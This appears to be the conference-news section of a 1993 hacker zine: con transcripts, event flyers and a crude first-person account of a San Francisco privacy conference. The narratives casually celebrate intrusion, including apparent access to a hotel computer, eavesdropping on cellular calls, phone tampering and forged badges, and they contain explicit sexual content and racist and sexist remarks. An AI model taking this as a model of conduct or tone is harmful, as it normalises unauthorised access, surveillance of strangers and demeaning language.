Also: for you hackers that have disappeared from my life, you who had
my number, my parents' number has never changed, you can contact me
through them if you like, I would love to hear from you.
It's not going to go away. There will always be new challenges. There
are always new toys for curious minds. There may be a split into
several different, only partially interlocking 'undergrounds' involving
different types of technological playing. In spite of Caller-ID and
advanced security functions of the new digital switches, there will
still be many ways to phreak around the phone system: taking advantage
of the old Crossbars in remote areas, and by finding some of the
'pheatures' in new switches.
Hacking on the Internet will always be around despite who controls the
net, though I am sure there would be a lot more destructive hacking if
the mega-corporations take it over. Security of systems is more a social
problem than a technological one, there is always a segment of the
population that is gullible, stupid, or corrupt. There will always be
some smartass out there making trouble for the Organization. Constantly
evolving systems and brand new systems will present security holes forever,
though they may be harder to understand as the systems grow more complex.
With more computers networked there will be a lot more to play with.
When the underground was small, isolated, and revered as black magicians
by outsiders, it was as though we were all part of some guild. Now that
there are many more people who have knowledge of, and access to, the
hacker community, there is little cohesiveness. I see this getting
worse. The solution may be tighter knit groups. But an outbreak of
wars between mega-gangs could be a real catastrophe.
Will the hype die? Time will tell. Sometimes I get so sick of the crap
I see on IRC that I wish someone would give me back an apple IIe and
an applecat 212, and set me back down in 1984. Just call me
over the hill.
CONFERENCE NEWS
PART I
****************************************************************************
For those of you who were at the con, or moreover were at the con
and can remember it (Sir Lance?), these transcripts are for you.
They are not absolute in their accuracy and are most likely full
of holes, however please keep in mind they are the transcribed
product of a hacker who is suffering from a hangover of heroic
proportions, and is typing to keep his mind off the mutiny
happening in his stomach.
Please note that within the transcripts you will find parts of
the speaker's words paraphrased, this is not intended to
misrepresent them, this is simply an easy way to cut to the chase
and get this job done. Another note to make is that with in this
transcript, several people have been labeled unknown, this is
either due to I could not see their face while they were speaking
or they wished to remain anonymous. These folks will be labeled
"unknown" keep in mind that this is for the above reasons and not
any slight, or K-RaD At|T|_|D3.
SummerCon
Stuart Hauser from SRI, Stanford Research Inst. was the first
speaker of the day, he was (or is) a older looking man who looked
relaxed and confident. He was here to tell us about SRI and their
goals (or he was here to milk the crowd for info, depends who you
talk to I suppose).
Stu conceded that the networks and companies had more to fear
from corporate espionage at the hands of employees and
mismanagement then they did from hackers. However he fears a
new breed of hackers he says are becoming a reality on the nets,
the hacker for cash, digital criminals. He felt that this new
breed of hacker will be counterproductive for the both the PD
world and the underground on the basis that if they destroy it
for the corps, we cannot use it either.
Control-C: (interjects) "Punk kids are all over the place doing it
man."
Stu: (offers example) Was told that at three companies have tried
to hire tiger teams, for corporate breaches however he has no proof
of this. Yet he feels the sources were reliable.
Stu: Says he hasn't heard about this. However if they are more
interested in what SRI is doing he will be sticking around until
this afternoon or evening. And has about 15 copies of the report that
are available to the public.
Next speaker
[I was out of the room for this speaker and asked Black Kat to
type this in, so your guess is as good as mine.]
Following this Count0 spoke for Brian Oblivion who could not be
there about an American Database/social program called America 2000.
Brian came across this information by the way of a group in Penn state,
the program is meant to monitor the attitudes of students, and how
they behave with within state standards..
Drunkfux, Merchandising
Drunkfux
Eric Nielson started by telling the crowd what had drawn him to
the CPSR, by the way of reading a discussion in congress about a
congressman defending the strength of a Starwars network by stating that the
gov had an excellent example for security: the phone networks in the
USA. Needless to say Eric had little faith in this analogy <G>.
He went on to describe what the CPSR covers and what they have
done recently in the of the clipper debate, Sundevil and other 1st
Amend. issues. He discussed the internal workings of CPSR and its
funding police as well as telling Conf Members how to go about joining.
Erik Bloodaxe
Erik started out with explaining why Phrack 43 is not yet out.
This is due to the fact that Stormking.com will not allow it to be mailed
from it, seeing as the owner does telco consulting and feels it would
be a conflict of interest. Furthermore he won't give the listserve to
the Phrack Staff, making it somewhat difficult to distribute. However KL
is acting as a mediator and hopefully this will be settled soon.
Mindvox was considered but rejected as a choice, for fear of people
getting a hold of the list..
On the issue of Phrack and the copyright, Erik had only ONE fed
register out of all those who collect it. However Phrack has
obtained logs of both CERT forwarding Phrack by mail, as well as Tymnet
obtaining the mag.
And of Course the new LOD issue was broached, however very
little was discussed on it and it was simply agreed to a large degree that
Cameron (lord Havoc) must have been seriously abused as a child to
display the type of obvious brain damage he is afflicted with now.
********End Of Transcript***********
*****************************************************************************
Presenting :::
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
The weather was right, too right. Something was foul in the
air. It was akin to that mythical 'Calm before the Storm' scenario
that is dreaded by so many. But, Scribbles and I boarded the
Techno-Laden SotMESC compact and took off down the Highway to our
ultimate goal . . . Hacker Heaven in Summertime Fun - SummerCon !!!
The trip continued, over hill and over dale. Dale was quite
considerate not to press charges. Colleges were passed in a blink
of the eye. Nothing was going to stop us. We were on a mission
from the Church. But, that's another story.
From the lobby it was obvious, there were unusual people here.
These were the kind of people that you fear your daughters would
never meet. The kind of people that kicked themselves into
caffeine frenzies and would become infatuated with virtual lands.
Yes, these were my kind of people.
Now, we all know that Friday is the warm-up day on what we can
expect to see at SCon during the main Saturday drag. It was no
surprise to find the main junction box rewired, pay-phones providing
free services, rooms rerouted and computers running rampant down the
hallways. But, the traditional trashing of Control-C's room this
early signaled that more would be needed to top the night. The
maid was definitely not pleased.
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
THE CONFERENCE
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
From the far side of the table came the infamous Emmanuel
Goldstein from 2600. He stated how he had testified at congress and
gave them a live demonstration of bandwidth scanning and redboxing.
While he was there, the inquisition started against him on the
issue of 2600. Emmanuel then tried to explain the culture to
our representative that it is bad to classify all hackers as
criminals. Goldstein then went on to talk about the DC 2600 bust
and how it has resulted in 2600 meetings springing up all across
the country. A review of several films on software piracy at
the office, disaster recovery and viruses from Commonwealth
Films was given. And, to highlight everything, 2600 has purchased
an AT&T van that they plan to take to assorted conventions and
start a fleet of these up.
Mrs Jasnagan,
Thank you
( Scribble , scribble )
We would be happy
to meet with you at
9:30 on Thursday, April
1st in Room 104
Sincerely,
M.Jarnagin
&
S.Dietrich
What did not happen ??? Control-C did not get laid, but
it was rumored that there were a few 12-year olds wandering
around the hotel looking for this legendary hacker. No deaths
had occured, the fires were kept to a minimum and nothing major
was noted as being broken.
Then the shit hit the fan. It seems several hackers had riled
the swingers into a frenzy. I guess the swingers couldn't swing
with it. What happened ??? Phones went ringing room to room and
radios blared to life that the cops were here !!! At count, there
were 6 cops, 1 sheriff and 4 hotel employees that started patrolling
the hallways. Yes, we were under room arrest at our own convention
in our own wing. Anyone that left there room was told to stay there
or they would be arrested. The cops were very insistent that no
pictures were to be taken. The swingers had broken our balls.
But, this would not stop us. Soon, there was a phone network
going on with radio interfaces. The windows opened and a few migrated
to other locations of the hotel. After a while, the authorities left
feeling satisfied that they had intimidated us. They didn't.
IBM will send a 36 page fax to the number you give them.
To activate, call 1-800-IBM-4FAX. As you can imagine, it wasn't
long before the hotels fax ran out of thermal paper.
[email protected]
[email protected]
[email protected]
[email protected]
359@7354 (WWIV Net)
HoHoCon
1310 Tulane, Box #2
Houston, Tx
77008-4106
713-468-5802 (data)
The shirts are $15 plus $3 shipping ($4 for two shirts). At this
time, they only come in extra large. We may add additional sizes if
there is a demand for them. The front of the shirt has the following
in a white strip across the chest:
I LOVE FEDS
December 18-20
Allen Park Inn
Houston, Texas
I LOVE WAREZ
The video includes footage from all three days, is six hours long and
costs $18 plus $3 shipping ($4 if purchasing another item also).
Please note that if you are purchasing multiple items, you only need
to pay one shipping charge of $4, not a charge for each item. If
you wish to send an order in now, make all checks or money orders
payable to O.I.S., include your phone number and mail it to the street
address listed above. Allow a few weeks for arrival.
ATDT EAST
617-350-STIF
Home of -= RDT...
****************************************************************************
#20) Do not rip the phone boxes out of the walls and cut
the wires.
#23) Always remove the mirrors from the walls to check for
hidden cameras.
#25) I really don't think the hotel will let us come back.
***************************************************************************
Hack-Tic Presents
H A C K I N G
at the E N D of the
U N I V E R S E
=========================================================================
HEU?
Remember the Galactic Hacker Party back in 1989? Ever wondered what
happened to the people behind it? We sold out to big business, you
think. Think again, we're back!
That's right. On august 4th, 5th and 6th 1993, we're organizing a
three-day summer congress for hackers, phone phreaks, programmers,
computer haters, data travellers, electro-wizards, networkers, hardware
freaks, techno-anarchists, communications junkies, cyberpunks, system
managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez
dudes, law enforcement officers (appropriate undercover dress required),
guerilla heating engineers and other assorted bald, long-haired and/or
unshaven scum. And all this in the middle of nowhere (well, the middle
of Holland, actually, but that's the same thing) at the Larserbos
campground four meters below sea level.
The three days will be filled with lectures, discussions and workshops
on hacking, phreaking, people's networks, Unix security risks, virtual
reality, semafun, social engineering, magstrips, lockpicking,
viruses, paranoia, legal sanctions against hacking in Holland and
elsewhere and much, much more. English will be the lingua franca for
this event, although one or two workshops may take place in Dutch.
There will be an Internet connection, an intertent ethernet and social
interaction (both electronic and live). Included in the price are four
nights in your own tent. Also included are inspiration, transpiration, a
shortage of showers (but a lake to swim in), good weather (guaranteed by
god), campfires and plenty of wide open space and fresh air. All of this
for only 100 dutch guilders (currently around US$70).
We will also arrange for the availability of food, drink and smokes of
assorted types, but this is not included in the price. Our bar will be
open 24 hours a day, as well as a guarded depository for valuables
(like laptops, cameras etc.). You may even get your stuff back! For
people with no tent or air mattress: you can buy a tent through us for
100 guilders, a mattress costs 10 guilders. You can arrive from 17:00
(that's five p.m. for analogue types) on August 3rd. We don't have to
vacate the premises until 12:00 noon on Saturday, August 7 so you can
even try to sleep through the devastating Party at the End of Time
(PET) on the closing night (live music provided). We will arrange for
shuttle buses to and from train stations in the vicinity.
HOW?
HA!
ME?
Maybe you are part of that select group that has something special to
offer! Participating in 'Hacking at the End of the Universe' is
exciting, but organizing your very own part of it is even more fun. We
already have a load of interesting workshops and lectures scheduled,
but we're always on the lookout for more. We're also still in the
market for people who want to help us organize during the congress.
SO:
MORE INFO:
Hack-Tic
Postbus 22953
1100 DL Amsterdam
The Netherlands
If you know a forum or network that you feel this message belongs on,
by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC,
WP.BAT, you name it. Spread the worm, uh, word.
=========================================================================
SCHEDULE
=========================================================================
One of the main discussions at the 1989 Galactic Hacker Party focused on
whether or not the alternative community should use computer networking.
Many people felt a resentment against using a 'tool of oppression' for
their own purposes. Computer technology was, in the eyes of many,
something to be smashed rather than used.
Times have changed. Many who were violently opposed to using computers
in 1989 have since discovered word-processing and desktop publishing.
Even the most radical groups have replaced typewriters with PCs. The
'computer networking revolution' has begun to affect the alternative
community.
Not all is well: many obstacles stand in the way of the 'free flow of
information.' Groups with access to information pay such high prices for
it that they are forced to sell information they'd prefer to pass on for
free. Some low-cost alternative networks have completely lost their
democratic structure. Is this the era of the digital dictator, or are we
moving towards digital democracy?
To discuss these and other issues, we've invited the following people
who are active in the field of computer networking: [Electronic mail
addresses for each of the participants are shown in brackets.]
Peter van der Pouw Kraan ([email protected]) was actively involved in the
squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas
about technology and its relation to society. Had a PC all the way back
in 1985!
The phone companies got wise and made a lot of things (nearly)
impossible. What is still possible today? What is still legal today?
What can they do about it? What are they doing about it?
You can use your own computer and modem to access some big computer
system at a university without the people owning that computer knowing
about it. For years this activity was more or less legal in Holland: if
you were just looking around on the Internet and didn't break anything
nobody really cared too much...
That is, until shortly before the new computer crime law went into
effect. Suddenly computer hackers were portrayed as evil 'crashers'
intent on destroying systems or, at least, looking into everyone's
files.
The supporters of the new law said that it was about time something was
done about it. Critics of the law say it's like hunting mosquitoes with
a machine-gun. They claim the aforementioned type of hacking is not the
real problem and that the law is excessively harsh.
WORKSHOPS
HEUnet introduction
an introduction to the Hacking at the End of the Universe network.
Unix security
RGB and fidelio have probably created more jobs in the unix security
business than the rest of the world put together. They'll talk about
some of the ins and outs of unix security.
E-mail networking
Should we destroy X400 or shall we let it destroy itself?
Audio Adventures
Steffen Wernery and Tim Pritlove talk about adventure games that you
play using a Touch Tone telephone.
Social Engineering
The Dude, well known from his articles in Hack-Tic, will teach you
the basics of social engineering, the skill of manipulating people
within bureaucracies.
'Hacking Plastic'
Tim and Billsf talk about the security risks in chip-cards, magnetic
cards, credit cards and the like.
APS Demo
APS (Activist Press Service) is operating a bbs in Amsterdam, The
Netherlands. You'll see it and will be able to play with it
'hands-on'.
This will get a little technical for those who want to know what we're
going to set up. If you don't know much about computers, just bring
whatever you have and we'll see how and if we can hook it up.
You can log in to our UNIX system(s) and send and receive mail and
UseNet news that way. Every participant that wants one can get her/his
own IP number to use worldwide. Users of the network are urged to make
whatever files they have on their systems available to others over the
ethernet. Bring anything that has a power cord or batteries and let's
network it!
=========================================================================
--
Hstorm ++31 2230 60551
Ad Timmering <[email protected]># ==Phrack
Magazine==
CONFERENCE NEWS
PART II
****************************************************************************
By Some Guy
1. The Arrival
I had been up for about 48 hours by the time America West dropped
me off at San Francisco's airport. The only thing I could think about
was sleep. Everything took on strange dreamlike properties as I staggered
through the airport looking for the baggage claim area. Somehow, I
found myself on an airport shuttle headed towards the Burlingame
Marriott. Suddenly I was standing in front of an Iranian in a red
suit asking me for a major credit card. After a quick shuffle of forms
at the checkin counter I finally had the cardkey to my room and was
staggering toward a nice warm bed.
Once in the room I fell down on the bed, exhausted. Within the space of a
few minutes I was well on my way to Dreamland. Within the space of a few
more minutes I was slammed back into reality as someone came barreling into
the room. Mr. Blast had arrived from Chitown with a bag full of corporate
goodies. I accepted a shirt and told him to get lost. No sooner had he left
than Fitzgerald burst in with enough manuals to stock a small college's
technical library. After griping for nearly 30 minutes at the fact that
I had neglected to likewise bring 500 pounds of 5ess manuals for him,
Fitzgerald took off.
Sleep.
2. Mindvodxka
After several needed hours rest, I took off downstairs to scope out the
spread. I ran into Bruce Sterling who relayed some of the mornings
events, the highlight of which was Don Delaney's "Finger Hackers" the
inner city folks who sequentially dial, by hand, every possible combination
of pbx code to then sell on street corners.
Out of the corner of my eye I spotted two young turks dressed like
mafioso: RBOC & Voxman. I wandered over and complimented them on their
wardrobe and told them to buy me drinks. Beer. Beer. More beer.
Screwdrivers. Screwdrivers. Last call. Last screwdriver.
RBOC and I decided that it was our calling to get more drinks. We took
off to find a bar. Upon exiting the hotel we realized that we were in
the middle of fucking nowhere. We walked up and down the street, rapidly
getting nowhere. In our quest for booze, we managed to terrorize a
small oriental woman at a neighboring hotel who, after 10 minutes of our
screaming and pounding, finally opened up the door to her office wide
enough to tell us there were no bars within a 15 mile radius.
We went back to the hotel very distraught.
We went back to RBOC's room where Voxman was sampling a non-tobacco smoke.
We bitched about the lack of watering holes in the vicinity, but he was
rather unsympathetic. After he finished his smoke and left the room, we
decided to order a bottle of vodka through room service and charge it
to Voxman since it was roughly 50 dollars.
RBOC called up room service and started to barter with the clerk about the
bottle. "Look, tell you what," he said, "I've got twenty bucks. You meet
me out back with two bottles. I give you the twenty and you keep one of
the bottles for yourself."
"Look man, I know you have about a thousand cases of liquor down there,
right? Who's going to miss two bottles? Don't you want to make a few
extra bucks? I mean, twenty dollars, that's got to be about what you make
in a day, right? I mean, you aren't exactly going to own this hotel any
time soon, am I right? So, I'll be down in a few minutes to meet you
with the vodka. What do you mean? Look man, I'm just trying to help out
another human being. I know how it is, I'm not made out of money either,
you know? Listen, I'm from NYC...if someone offers me twenty dollars
for nothing, I take it, you know? So, do we have a deal?"
This went on for nearly an hour. Finally RBOC told the guy to just bring up
the damn bottle. When it arrived, the food services manager, acting as
courier, demanded proof of age, and then refused to credit it to the room.
This sparked a new battle, as we then had to track down Voxman to sign
for our booze. After that was settled, a new crisis arose: We had no
mixer.
The soda machine proved our saviour. Orange Slice for only a dollar a
can. We decided to mix drinks half and half. Gathering our fluids,
we adjourned to the lobby to join Voxman and a few conventioneers.
The vodka went over well with the crew, and many a glass was quaffed
over inane conversation about something or other.
3. It Begins.
I woke late, feeling like a used condom. I noticed more bags in the room
and deduced that X-con had made it to the hotel. After dressing, I staggered
down to the convention area for a panel.
"Censorship and Free Speech on the Networks" was the first one I got to
see. The main focus of the panel seemed to be complaints of alt.sex
newsgroups and dirty gifs. As these two are among my favorite things
about the net, I took a quick disliking of the forum. Nothing was resolved
and nothing was stated.
There was a small break during which I found X-con. We saw a few feds.
It was neat. The head of the FBI's computer crime division called me by name.
That was not terribly neat.
The next session was called "Portrait of the Artist on the Net." X-con
and I didn't get it. We felt like it was "portrait of the artist on
drugs on the net." Weird videos, odd projects, and stream of
consciousness rants. Wasn't this a privacy conference? We were confused.
The session gave way to a reception. This would have been uneventful had
it not been for two things: 1) an open bar 2) the arrival of the Unknown
Hacker. U.H. was probably the most mysterious and heralded hacker on
the net. The fact that he showed up in public was monumental.
The reception gave way to dinner, which was uneventful.
A few days before the con, Mr. Blast had scoured the net looking for
dens of inequity at my behest. In alt.sex.bondage he had run across
a message referring to "Bondage A Go-Go." This was a weekly event at
a club in the industrial district called "The Bridge." The description
on the net described it as a dance club where people liked to dress up
in leather and spikes, and women handcuffed to the bar from
9-11 drank free! This was my kind of place.
On that Wednesday night, I could think of nothing but going out and
getting to Bondage A Go-Go. I pestered X-con, Mr. Blast and U.H. into
going. We tried to get Fender to go too, but he totally lamed out.
(This would be remembered as the biggest mistake of his life.)
The lights went up, and a new girl came out. She was followed by a
friend carrying several items. The first girl began to read rather
obscure poetry as the second undressed her. Once girl1 was free
of restrictive undergarments girl2 donned surgical gloves and
began pouring generous amounts of lubricant over her hands. As the
poetry reached a frantic peak, girl2 slowly inserted her entire hand
into girl1.
The fisting continued for an eternity, with girl1 moving around the stage
complaining in her poetic rant about how no man could ever satisfy her.
(This was of no surprise to me since she had an entire forearm up her twat.)
Girl2 scampered around underneath, happily pumping away for what seemed like
an hour.
When the performance ended, a very tall woman in hard dominatrix gear
sauntered out on the stage. From her Nazi SS cap to her stiletto heels
to her riding crop, she was the top of my dreams. Two accomplices tied
a seemingly unwilling bottom to the stage and she began striking
her repeatedly with the crop, to the beat of something that sounded like
KMFDM. The screams filled the club, and drool filled the corners of my
mouth.
As the song ended, the girls all came back out on stage and took a bow
to deafening applause. Then the disco ball lit up, and Ministry began
thundering, and people began to dance like nothing had ever
happened. We were a bit stunned.
We all wandered up to the second level where we were greeted by a guy and
two girls going at it full on. I staggered dazed to the second story on the
opposite side. There was a skinhead getting a huge tattoo and a girl
getting a smaller one. I was not brave enough to risk the needle in
San Francisco, so I wandered back downstairs. That's where I fell in love.
She was about 5'2", clad in a leather teddy, bobbed blood red hair, carrying
a cat o'nine tails. Huge, uh, eyes. Alas, 'twas not to be. She was
leading around a couple of boy toys on studded leashes. Although the
guys seemed to be more interested in each other than her, I kept away,
knowing I would get the hell beaten out of me if I intervened.
5. Thursday
I drug him into the meeting hall where we sat and made MST3K-like
commentary during the panel. I began to get mad that no one had
even mentioned the lack of legislation regarding medical records privacy,
nor the human genome project. I was formulating my rude commentary
for the question period when the last speaker thankfully brought
up all these points, and chastised everyone else for not having done
so previously. Good job.
I snaked The Pilot a lunch pass, and we grabbed a bite. It was pretty
good. I noticed that it was paid for by Equifax or Mead Data Central
or some other data-gathering puppet agency of The Man. No doubt a
pathetic ploy to sway our feelings. I ate it anyway.
After lunch, John Perry Barlow got up to bs a bit. The thing that stuck me
about Barlow was his rant about the legalization of drugs. Yet another
stray from computers & privacy. It must be nice to be rich enough to
stand in front of the FBI and say that you like to take acid and think
it ought to be legal. I debated whether or not to ask him if he
knew where to score any in San Francisco, but decided on silence, since
I'm not rich.
I lost all concept of time and space after Barlow's talk, and have no idea
what happened between that time and that evening.
A certain New York State Policeman had been given the remainder of the
bottle of vodka from the previous night. It was gone in record time.
Later he was heard remarking about how hackers should get the death
penalty. When Emmanuel Goldstein demonstrated his Demon Dialer from
the Netherlands, he sat in the corner slamming his fist into his hand
muttering, "wait till we get home, you'll get yours."
I went outside and hid. Also hiding outside was Phiber. We exchanged a
few glares. He and I had been exchanging glares since our respective
arrivals. But neither of us said anything directly to the other.
I had heard from several people that Phiber had remarked, "on the third
day, I'm gonna get that guy. Just you wait." I was waiting.
It was a Herculean task to gather the crew. Despite their desire to go,
everyone farted around and rounding them up was akin to a cattle
drive. Fender cried about having to attend this BOF and that BOF and
Mr. Blast cried about being tired, Fitzgerald cried about not being
old enough to go, and I just cried. Eventually we gathered our
crew and launched.
We initially went out to locate the Mitchell Brothers club. I had heard that
it was quite rad. Totally nude. Lap dancing. Total degradation and
objectification. Wowzers.
U.H. said he knew where it was. He was mistaken. The address in the
phone book was wrong. It was nowhere to be found. We ended back up
on Market surrounded by junkies and would-be muggers. Thankfully,
there were no fresh corpses. I saw a marquee with the banner Traci Topps.
We noticed some old perv at the far end of our row in a trench. It was
like out of a bad movie. He was not at all shy about his self-satisfaction
and in fact seemed quite proud of it. He kept trying to get the girls to
bend down so he could fondle them. Gross beyond belief. We debated
whether or not to point and laugh at him, but decided he might have
something more deadly concealed under the trench and tried to ignore it.
Some more furniture passed across the stage. One sauntered over to me
and asked if I'd like any company. I asked her what the hell this place
was all about. She said that this was the way most places were downtown.
I told her that I expected tables, beer, and a happy upbeat tempo. She
shrugged and said she didn't know of anything really like that.
On the stage a really cute girl popped up. A shroom on this turd of a club.
Fender and I both decided she was ours. Fender said there was no way that
I would get the only good looking girl in the place. I said he needed to
get real, that it would be no contest.
We took off to Lombard street and fantasized about letting the rental
car loose to plummet down the hill, destroying everything in its
path. Next time we decided we would.
Then it was decided that it would be a good idea to look for some food.
We ended up somewhere where there was some kind of dance club.
Everything was closed and there was no food to be seen. Walking down
a few side streets looking for food, U.H. decided to tell Fender that
he had broken into his machine. Fender turned about 20 shades of green.
We then went back to the Golden Gate Bridge since it never closed and
stared out at the bay. Fender began to talk incoherently so it
became urgent that we get back to the hotel and put him to bed to dream
happy dreams of his stripper Edie.
Back at the hotel X-con and I could not sleep. The notebook had found
a number of carriers. One was for a System V unix. We decided that
this was the hotel's registration computer. We knew most used some kind of
package like encore, so we...well. :) We also found several odd systems,
probably some kind of elevator/ac/power controllers or whatnot.
At 5am or so, X-con and I took off to explore the hotel. Down in the lobby we
found RBOC busily typing away to a TTD operator on the AT&T payphone 2000.
He was engrossed in conversation, so we left him to his typing.
X-con started to look around the Hertz counter for anything exciting and
set off the alarm. Within seconds security arrived to find me
perched on the shoeshine stand and X-con rapping on the payphone to
another hotel. We told him we hadn't seen anyone go behind the counter.
He didn't believe us but left anyway.
As we burst into fits of laughter, Mitch Kapor, in shorts and t-shirt came
cruising by and exited through a glass door. We weren't quite sure if he
were real so we snuck through the door after him. The door led to the
gym. Mitch was busily pedaling away on an exercycle.
X-con and I decided to explore the hotel since we never even knew there
was a gym, and who could tell what other wild and wacky places remained
unseen. We took off to find the roof, since that was the most obvious
place to go that we should not be. Finding the stairwell with roof access,
we charged up to the top landing. The roof was unlocked, but right before
opening the hatch, we noticed that there was a small magnetic contact
connected to a lead. Not feeling up to disabling alarm systems so
late in the evening (or early in the morning), we took off.
On another level, we found the offices. Simplex locks. Amazing.
Evil grins began to form, but we wimped out, besides it was damn near
convention time.
Outside the convention room the caterers had set up the coffee urns.
X-con and I dove into the java like Mexican cliff jumpers. It got
to be really really stupid. We were slamming coffee like there was no
tomorrow. Fuck tomorrow, we slammed it like there was no today.
I put about eight packets of sugar in each of my cups. Ahh, nothing like
a steamin' cup o' joe. By the time we were done we had each drank
nearly 20 cups. The world was alive with an electric hum. We were ready
to take on the entire convention. Yep. After another cup.
The first panel of the day was "Gender Issues in Computing and
Telecommunications." As the talk began, the pig in me grew restless.
"What's all this crap?" it said. "Bunch of feminazis bitching about
gifs. They should all go to the bridge next Wednesday, that will give them
a new perspective. Where's Shit Kickin' Jim when you need him?"
Then I got more idealistic in my thinking. "Ok, fine, if women
demand equal treatment on the net, then what about equal treatment for
homosexuals? What about equal treatment for hermaphrodites? What about
equal treatment for one-legged retired American Indian Proctologists on
the net? And let us not forget the plight of the Hairless. Geez. What
a load of hooey. I wanted to jump up and yell, "THE NET IS NOT REAL!
WORRY ABOUT THE REAL WORLD AND THE NET WILL CHANGE! YOU CANNOT CHANGE
REALITY BY CHANGING THE NET!" If only I'd had another cup of coffee, I might
have done it.
The women got nothing done. After the panel X-con and I took off to the
room, after getting a few cups of coffee for the elevator ride. We sat
in the hotel room and made rude noises until Mr. Blast and Fitzgerald
got up. We all fought for the shower and by noon we were ready to
venture outward for lunch.
10. Cliffie!
The lunch that day had a few pleasant surprises. The first came in the
form of a waitress with HUGE, uh, eyes. Having something of an
fetish for big, ahem, eyes, I practiced my patented Manson-like gaze
for her benefit. The second surprise came when a the CFP staffers
cornered a couple of people at our table.
KCrow and Xaen had photocopied lunch tickets and forged badges to hang
out at the conference. Finally, on the last day, the staffers suddenly
decided that these two might not be paying attendees. Whether it was
the names on their badges that did not check out, or the fact that
Xaen had been walking around in a red and white dress-like robe the entire
day. They let them stay, but told them next time to either make better
forgeries or send in their scholarship applications like everyone else.
As lunch drew to a close, the crowd grew restless. A cry rang out,
"CLIFFIE!" The crowd took up the cry, and executives began throwing
conference papers in the air, stomping their feet and holding up
their lit cigarette lighters. "We want Cliffie, we want Cliffie!"
The house lights dimmed and a silhouette of frazzled hair appeared at the
head of the room.
Well, maybe it wasn't quite like that. Cliff Stoll took the stand and
began a stream of consciousness rant that would make someone with a bipolar
disorder look lucid. Contorting himself and leaping on tables, Cliff
definitely got my attention. It was kind of like watching Emo Philips
on crank while tripping. I dug it. If you have the opportunity
to catch Cliff on his next tour, make sure to do so. Lorne Michaels could
do worse than make some kind of sitcom around this guy. It was
probably the most amazing thing I had seen at the official conference.
Fitzgerald heard that there was a Pac Bell museum downtown. This news
evoked a Pavlovian response almost as pronounced as me at The Bridge.
Me and The Pilot wanted to check it out too so we decided to go.
It was like the Warner Bros. cartoon of the big dog and the little dog
"huh Spike, we gonna get us a cat, aren't we Spike, yep, we are gonna get
that cat, boy, aren't we Spike, yep, yep, boy I can't wait, boy is that
darn cat gonna be sorry, isn't he Spike, huh, Spike, huh?" Fitzgerald
was psyched.
Driving through downtown San Francisco was kind of like some kind of
deranged Nientendo game. The streets were obviously layed out by farm
animals. Traffic was disgusting. Of course, 3:30 on Friday afternoon
is official road construction time in downtown San Francisco. That was
not in my "Welcome To SF" guide, so I penciled it in.
About 4:00 we found an open lot, amazingly enough across from the
Pac Bell building. We paid roughly 37 thousand dollars for the spot and
took off to the museum. Fitzgerald was in heaven. He had called the
museum from the hotel before we left and told them we were on our way.
That night everyone decided to move into our room. Somehow Fitzgerald stole
a bed and wheeled it into our room to allow for more sleep space. So, it was
X-con, Fitzgerald, me, Fender and Mr. Blast all smashed into the little
room. As we were sitting in the room discussing what to do that
evening, the door burst open and a large man in basketball sweats walked
in. After he saw us in the room he turned around and quickly exited.
Fitzgerald ran out in the hall after him and discovered that the whole hall
was full of basketball players. We called down to the front desk to complain
that our room had been given out. The desk apologized and told us that the
mistake had been noticed and they would correct the problem with the
basketball team. This did not exactly sit well with me, as I envisioned
shitloads of jocks rooting through our stuff, taking my camera and
various and sundry electronics gear.
We found several Pac Bell offices but the only one with any type of
dumpster had nothing to offer save old yellow pages and pizza boxes.
We were totally bummed. We decided to wander around aimlessly
to see what we could stumble across.
After making about a dozen turns and walking a mile or two we came across
a huge black beast of a building. It looked like the Borg Cube. It was
vast and foreboding. It was an AT&T building. Fitzgerald took off
towards the door to ask for a tour. It was only 11:00 in the evening,
so we were certain that we would be given a hearty welcoming and
guided journey through the bowels of the cube. Yeah, right.
We decided that this place must be the point of presence for the West Coast
since it was just so damn impenetrable. As we turned to leave I noticed a
small piece of white cord on the ground. As I picked it up, we noticed it
led from a small construction shack behind the POP. It ran all the way
from the shack to a heavy steel door in the side of the cube where it
snaked its way under the door into the building and probably into the
frame. We all had a great laugh at the exposed line, and wished we
would have had a test-set to make a few choice overseas calls.
We wandered back to the cars and ended up driving around downtown some
more for a few hours before ending up back at the hotel.
We all regrouped the next morning to go shopping downtown. Fender was kind
enough to dish out vast quantities of chocolate-covered espresso beans
and we all got completely wired. X-con and I decided that we should have had
a bag of these the previous morning.
We drove straight down to Chinatown and began looking for a place to park.
Mr. Blast, Fender, X-con were in one car, me, Fitzgerald and The Pilot
in another. Mr. Blast, for being from a huge city, had absolutely no
concept of driving in traffic in a downtown setting. He missed lots,
made weird turns, ran lights and generally seemed like he was trying
to lose us. He achieved his desired goal.
We cursed his name for fifteen minutes and then gave up our search.
Fitzgerald had swiped Fender's scanner and was busily entertaining
himself listening to cellular phone calls. He had the window rolled down
in the back seat and took great joy in holding up the scanner so people
walking down the street could join in on the voyeuristic fun. Suddenly
Fitzgerald shouted, "HOLY SHIT! I can't believe it!"
The Pilot and I nearly had matching strokes, "WHAT?" I said. "It's
ENCRYPTED! I can't believe it man, encrypted speech on the phone!"
I began to laugh, and The Pilot soon joined in. It was Mandarin.
"Where the hell are we, Fitz?" I asked him. "San Francisco, " he replied.
"No," I said, "Specifically, where in San Francisco?" Fitzgerald
thought for a minute and said, "Uh, Chinatown?" Suddenly, his eyes
lit up, "OHHHHHHH. Hehe.. it's not encrypted is it?" We laughed at him
for about ten minutes.
We came to a stop light where a very confused Chinese lady was looking
at us. Fitzgerald held up the scanner and I yelled, "Herro!" We
went hysterical as we drove off, leaving the woman even more bewildered.
We found a place to park and decided to explore on our own. The plethora
of little Chinese hotties blew my mind. We staggered around Chinatown
trying to get bargains on electronics gear. It struck us all as odd
that every electronics store in the downtown area was owned and
operated by Iranians. Needless to say, no bargains were found.
We took off into the crowds to try to find cheap watches, since The Pilot's
watch was ready to retire. He soon made a totally sweet deal on a watch
from an oriental merchant and we took off for the car. On the way we noticed
a small shop in a back alley with throwing stars in the window.
Inside was ninja heaven. They had daggers, cloaks, stars, nunchaca,
swords, masks and tons and tons of violence inducing paraphanalia. I saw
a telescoping steel whip behind a case. I knew I must possess this item,
and when I found out that it was only $22.00 the money was already in
